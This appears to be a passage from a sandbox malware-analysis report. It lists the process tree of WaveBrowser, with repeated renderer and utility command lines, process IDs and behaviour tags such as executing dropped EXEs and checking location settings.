C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6700,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6720 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:7016
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6964,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6136 /prefetch:25⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:6192
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6452,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6408 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6456
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6480,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6432 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6772
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6932,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7300 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6780
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6056,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6076 /prefetch:85⤵
- Executes dropped EXE
PID:2908
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6528,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6468 /prefetch:85⤵
- Executes dropped EXE
PID:3552
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6536,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7508 /prefetch:85⤵
- Executes dropped EXE
PID:6416
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5188,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7632 /prefetch:85⤵
- Executes dropped EXE
PID:5884
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7440,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7612 /prefetch:85⤵
- Executes dropped EXE
PID:6560
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7624,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5244 /prefetch:85⤵
- Executes dropped EXE
PID:6352
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7444,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7940 /prefetch:85⤵
- Executes dropped EXE
PID:6628
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8084,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6120 /prefetch:85⤵
- Executes dropped EXE
PID:6984
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6032,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7616 /prefetch:85⤵
- Executes dropped EXE
PID:6380
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6040,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6028 /prefetch:85⤵
- Executes dropped EXE
PID:6960
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8552,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7084 /prefetch:85⤵
- Executes dropped EXE
PID:6784
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8548,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8516 /prefetch:85⤵
- Executes dropped EXE
PID:6908
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8584,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8212 /prefetch:85⤵
- Executes dropped EXE
PID:6848
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7688,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8544 /prefetch:85⤵
- Executes dropped EXE
PID:5884
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7972 /prefetch:85⤵
- Executes dropped EXE
PID:6744
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5276,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7772 /prefetch:85⤵
- Executes dropped EXE
PID:6380
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7660,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8300 /prefetch:85⤵
- Executes dropped EXE
PID:6868
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5180,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8320 /prefetch:85⤵
- Executes dropped EXE
PID:6512
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8224,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8260 /prefetch:85⤵
- Executes dropped EXE
PID:6772
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8340,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7788 /prefetch:85⤵
- Executes dropped EXE
PID:6864
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7244 /prefetch:85⤵PID:6944
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8336,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7676 /prefetch:85⤵PID:7340
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8288,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7272 /prefetch:85⤵PID:7352
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7076,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8576 /prefetch:85⤵PID:7364
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8412,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8916 /prefetch:85⤵PID:7448
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7080,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9056 /prefetch:85⤵PID:7644
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9208,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9224 /prefetch:85⤵PID:7760
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9360,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9372 /prefetch:85⤵PID:7816
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5992,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9352 /prefetch:85⤵PID:7220
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9628,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9640 /prefetch:85⤵PID:7360
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9780,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9792 /prefetch:85⤵PID:7608
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9936,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9948 /prefetch:85⤵PID:7588
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8924,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10088 /prefetch:85⤵PID:7656
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10236,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10228 /prefetch:85⤵PID:2428
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=10420,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10396 /prefetch:25⤵
- Checks computer location settings
PID:6384
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10416,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10544 /prefetch:85⤵PID:2388
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10528,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10700 /prefetch:85⤵PID:7756
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10840,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10852 /prefetch:85⤵PID:7912
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10992,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11000 /prefetch:85⤵PID:8128
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11144,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11152 /prefetch:85⤵PID:8036
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10980,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11316 /prefetch:85⤵PID:3760
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11432,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11308 /prefetch:85⤵PID:7284
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6268,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7800 /prefetch:85⤵PID:7484
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6052,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8400 /prefetch:85⤵PID:1284
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7136 /prefetch:85⤵PID:7236
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6064,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10376 /prefetch:85⤵PID:7316
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4048,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7540 /prefetch:85⤵PID:2544
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7512,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8992 /prefetch:85⤵PID:8156
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9144,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7568 /prefetch:85⤵PID:8184
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9184,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9076 /prefetch:85⤵PID:7508
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10112,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9124 /prefetch:85⤵PID:7520
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7324,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7368 /prefetch:85⤵PID:7528
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --field-trial-handle=11228,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10612 /prefetch:15⤵
- Checks computer location settings
PID:6540
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=10076,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9972 /prefetch:25⤵
- Checks computer location settings
PID:6416
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=8144,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8128 /prefetch:25⤵
- Checks computer location settings
PID:7680
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --field-trial-handle=7676,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11192 /prefetch:15⤵
- Checks computer location settings
PID:8016
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=8720,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10764 /prefetch:25⤵
- Checks computer location settings
PID:7912
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --field-trial-handle=8180,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8504 /prefetch:15⤵
- Checks computer location settings
PID:6468
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --field-trial-handle=10784,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10576 /prefetch:25⤵
- Checks computer location settings
PID:6784
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --field-trial-handle=5660,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10876 /prefetch:15⤵
- Checks computer location settings
PID:7928
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --field-trial-handle=10232,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6220 /prefetch:25⤵
- Checks computer location settings
PID:7932
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --field-trial-handle=7764,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7772 /prefetch:25⤵
- Checks computer location settings
PID:7396
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --field-trial-handle=7748,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10892 /prefetch:15⤵
- Checks computer location settings
